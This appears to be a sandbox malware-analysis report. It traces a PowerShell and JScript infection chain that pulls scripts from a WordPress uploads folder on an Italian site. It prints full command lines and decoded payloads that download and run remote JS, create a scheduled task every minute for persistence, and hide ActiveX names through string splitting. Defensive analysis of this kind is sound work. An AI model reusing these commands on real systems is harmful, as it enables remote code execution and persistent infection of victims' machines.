                                            Dec 3, 2024 09:15:10.115247965 CET4434970046.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:10.115309000 CET4434970046.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:10.115370989 CET49700443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:10.115885973 CET49700443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:15.466275930 CET49702443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:15.466315031 CET4434970246.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:15.466375113 CET49702443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:15.497865915 CET49702443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:15.497885942 CET4434970246.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:17.231813908 CET4434970246.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:17.231897116 CET49702443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:17.234488010 CET49702443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:17.234500885 CET4434970246.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:17.234756947 CET4434970246.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:17.241713047 CET49702443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:17.287338018 CET4434970246.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:17.800188065 CET4434970246.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:17.800268888 CET4434970246.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:17.800383091 CET49702443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:17.836272001 CET49702443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:49.374097109 CET49783443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:49.374108076 CET4434978346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:49.374176025 CET49783443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:49.378024101 CET49783443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:49.378038883 CET4434978346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:51.052578926 CET4434978346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:51.052643061 CET49783443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:51.055705070 CET49783443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:51.055711985 CET4434978346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:51.055953979 CET4434978346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:51.061959982 CET49783443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:51.107345104 CET4434978346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:51.608546019 CET4434978346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:51.608652115 CET4434978346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:15:51.608706951 CET49783443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:15:51.629618883 CET49783443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:16:47.937865973 CET49913443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:16:47.937906981 CET4434991346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:16:47.937992096 CET49913443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:16:47.940732002 CET49913443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:16:47.940745115 CET4434991346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:16:49.565701962 CET4434991346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:16:49.565881968 CET49913443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:16:49.568124056 CET49913443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:16:49.568144083 CET4434991346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:16:49.568459034 CET4434991346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:16:49.574831963 CET49913443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:16:49.619328976 CET4434991346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:16:50.114815950 CET4434991346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:16:50.114909887 CET4434991346.254.34.201192.168.2.7
                                            Dec 3, 2024 09:16:50.115015984 CET49913443192.168.2.746.254.34.201
                                            Dec 3, 2024 09:16:50.136049032 CET49913443192.168.2.746.254.34.201

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Dec 3, 2024 09:15:05.441310883 CET4977453192.168.2.71.1.1.1
                                            Dec 3, 2024 09:15:05.579751968 CET53497741.1.1.1192.168.2.7

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Dec 3, 2024 09:15:05.441310883 CET192.168.2.71.1.1.10x470aStandard query (0)www.italialife24.itA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Dec 3, 2024 09:15:05.579751968 CET1.1.1.1192.168.2.70x470aNo error (0)www.italialife24.ititalialife24.itCNAME (Canonical name)IN (0x0001)false
                                            Dec 3, 2024 09:15:05.579751968 CET1.1.1.1192.168.2.70x470aNo error (0)italialife24.it46.254.34.201A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • www.italialife24.it

                                            HTTPS Proxied Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.74969946.254.34.2014436652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:15:07 UTC113OUTGET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1
                                            Host: www.italialife24.it
                                            Connection: Keep-Alive
                                            2024-12-03 08:15:07 UTC253INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:15:07 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Vary: Accept-Encoding
                                            Referrer-Policy: no-referrer-when-downgrade
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            2024-12-03 08:15:07 UTC18INData Raw: 38 0d 0a 77 73 63 72 69 70 74 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 8wscript 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.74970046.254.34.2014436652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:15:09 UTC92OUTGET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1
                                            Host: www.italialife24.it
                                            2024-12-03 08:15:10 UTC253INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:15:09 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Vary: Accept-Encoding
                                            Referrer-Policy: no-referrer-when-downgrade
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            2024-12-03 08:15:10 UTC316INData Raw: 31 33 30 0d 0a 76 61 72 20 66 6e 6e 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 66 6e 6e 2e 52 75 6e 28 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 6d 61 6e 64 20 5c 22 49 57 52 20 2d 6f 75 74 66 69 20 24 65 6e 76 3a 70 72 6f 67 72 61 6d 64 61 74 61 5c 5c 4e 44 55 34 36 32 4a 41 38 4c 35 4d 2e 6a 73 20 2d 75 73 65 62 61 73 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 61 6c 69 61 6c 69 66 65 32 34 2e 69 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 35 2f 61 66 72 65 74 50 66 2e 70 68 70 27 3b 20 73 63 68 74 61 73 6b 73 20 2f 64 65 6c 65 74 65 20 2f 74 6e 20 22 20 2b 20 57 53 63 72 69 70 74 2e 61 72 67 75 6d 65 6e 74 73 28 30 29 20 2b 20 22
                                            Data Ascii: 130var fnn = new ActiveXObject("WScript.Shell")fnn.Run("powershell -command \"IWR -outfi $env:programdata\\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn " + WScript.arguments(0) + "


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.74970246.254.34.2014437428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:15:17 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: www.italialife24.it
                                            Connection: Keep-Alive
                                            2024-12-03 08:15:17 UTC253INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:15:17 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Vary: Accept-Encoding
                                            Referrer-Policy: no-referrer-when-downgrade
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            2024-12-03 08:15:17 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                            Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.74978346.254.34.2014437932C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:15:51 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: www.italialife24.it
                                            Connection: Keep-Alive
                                            2024-12-03 08:15:51 UTC253INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:15:51 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Vary: Accept-Encoding
                                            Referrer-Policy: no-referrer-when-downgrade
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            2024-12-03 08:15:51 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                            Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.74991346.254.34.2014436256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:16:49 UTC202OUTGET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: www.italialife24.it
                                            Connection: Keep-Alive
                                            2024-12-03 08:16:50 UTC253INHTTP/1.1 200 OK
                                            Date: Tue, 03 Dec 2024 08:16:49 GMT
                                            Server: Apache
                                            Upgrade: h2,h2c
                                            Connection: Upgrade, close
                                            Vary: Accept-Encoding
                                            Referrer-Policy: no-referrer-when-downgrade
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            2024-12-03 08:16:50 UTC1300INData Raw: 35 30 38 0d 0a 76 61 72 20 66 31 3d 22 53 63 72 22 2c 66 32 3d 22 69 6e 67 2e 46 69 22 2c 66 33 3d 22 73 74 65 6d 4f 62 22 0a 76 61 72 20 66 73 6f 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 66 31 2b 22 69 70 74 22 2b 66 32 2b 22 6c 65 53 79 22 2b 66 33 2b 22 6a 65 63 74 22 29 0a 76 61 72 20 77 31 3d 22 57 53 63 22 2c 77 32 3d 22 72 69 50 74 22 2c 77 34 3d 22 65 4c 6c 22 0a 76 61 72 20 77 73 68 3d 77 31 2b 77 32 2b 22 2e 73 48 22 2b 77 34 0a 76 61 72 20 62 62 6a 3d 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 77 73 68 29 0a 76 61 72 20 66 6c 64 72 3d 47 65 74 4f 62 6a 65 63 74 28 22 77 69 6e 6d 67 6d 74 73 3a 72 6f 6f 74 5c 5c 63 69 6d 76 32 3a 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 3d 27 63 70 75 30 27 22 29 2e 41 64 64
                                            Data Ascii: 508var f1="Scr",f2="ing.Fi",f3="stemOb"var fso = new ActiveXObject(f1+"ipt"+f2+"leSy"+f3+"ject")var w1="WSc",w2="riPt",w4="eLl"var wsh=w1+w2+".sH"+w4var bbj=new ActiveXObject(wsh)var fldr=GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").Add


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:03:15:02
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $KxiAN4CB6Eh1v = New-Object Net.WebClient; $cio = $KxiAN4CB6Eh1v.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $KxiAN4CB6Eh1v.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'epZTzlYAtsWrS0.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('epZTzlYAtsWrS0.js ' * 2)) /tn e0OvtdEL8;
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:1
                                            Start time:03:15:02
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:03:15:09
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\schtasks.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js " /tn e0OvtdEL8
                                            Imagebase:0x7ff6e7da0000
                                            File size:235'008 bytes
                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:11
                                            Start time:03:15:11
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
                                            Imagebase:0x7ff63c900000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:03:15:14
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:03:15:14
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:03:15:17
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\schtasks.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
                                            Imagebase:0x7ff6e7da0000
                                            File size:235'008 bytes
                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:03:15:17
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
                                            Imagebase:0x7ff63c900000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:17
                                            Start time:04:32:01
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
                                            Imagebase:0x7ff63c900000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:18
                                            Start time:04:32:01
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:19
                                            Start time:04:32:01
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:20
                                            Start time:04:32:04
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\schtasks.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
                                            Imagebase:0x7ff6e7da0000
                                            File size:235'008 bytes
                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:21
                                            Start time:04:32:04
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
                                            Imagebase:0x7ff63c900000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:24
                                            Start time:04:33:00
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wscript.EXE C:\Users\user~1\AppData\Local\Temp\epZTzlYAtsWrS0.js epZTzlYAtsWrS0.js
                                            Imagebase:0x7ff63c900000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:25
                                            Start time:04:33:00
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\NDU462JA8L5M.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn epZTzlYAtsWrS0.js /f; wscript $env:programdata\NDU462JA8L5M.js "
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:26
                                            Start time:04:33:00
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:27
                                            Start time:04:33:03
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\schtasks.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn epZTzlYAtsWrS0.js /f
                                            Imagebase:0x7ff6e7da0000
                                            File size:235'008 bytes
                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:28
                                            Start time:04:33:03
                                            Start date:03/12/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\NDU462JA8L5M.js
                                            Imagebase:0x7ff63c900000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Executed Functions

                                              Function 00007FFAAC7A2FB3 Relevance: .4, Instructions: 368COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1376746425.00007FFAAC7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaac7a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4995d9efdf81bc12a07d634459f40bf60aa5a7f2b283bc1abb34059f0d7d2505
                                              • Instruction ID: 80013401b720970de0089d7a834f54f7a16ec179c2a049bef36f7bfee7a77ad8
                                              • Opcode Fuzzy Hash: 4995d9efdf81bc12a07d634459f40bf60aa5a7f2b283bc1abb34059f0d7d2505
                                              • Instruction Fuzzy Hash: 33C13B71A18A498FEB98DF5CC485AA9B7F1FFA9700F148169D40DD7295CE34E8858BC0
                                              Function 00007FFAAC8710C9 Relevance: .2, Instructions: 210COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1377036494.00007FFAAC870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaac870000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5df48a078a63af50b74399fe655e4998768d1a813a07b9e40c87ccf1ad0b40aa
                                              • Instruction ID: 2671cbb620821f4f764e4a97825c9d86c6498ab1e57dd2a6069e8dde937fb6a5
                                              • Opcode Fuzzy Hash: 5df48a078a63af50b74399fe655e4998768d1a813a07b9e40c87ccf1ad0b40aa
                                              • Instruction Fuzzy Hash: 1F510A62A1EB968FF798976858521B877D1FF46220B1441FED44DC79D3FD18F80982C1
                                              Function 00007FFAAC870DAE Relevance: .2, Instructions: 202COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1377036494.00007FFAAC870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaac870000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9b97740a85fdd75dee00470e390f3d940e4993fc3429ea9a85689a21f916a272
                                              • Instruction ID: 126f9976aeae3018436ba49f4032729c772997c8c51604bb248e239c19a850a7
                                              • Opcode Fuzzy Hash: 9b97740a85fdd75dee00470e390f3d940e4993fc3429ea9a85689a21f916a272
                                              • Instruction Fuzzy Hash: 0951F853A1FAAA4FF7A5976C58652B966C1FF4A610B1841FAD04DC31C3EE08F80882C1
                                              Function 00007FFAAC870DFA Relevance: .1, Instructions: 122COMMON
                                              Download Yara Rule
                                              Memory Dump Source
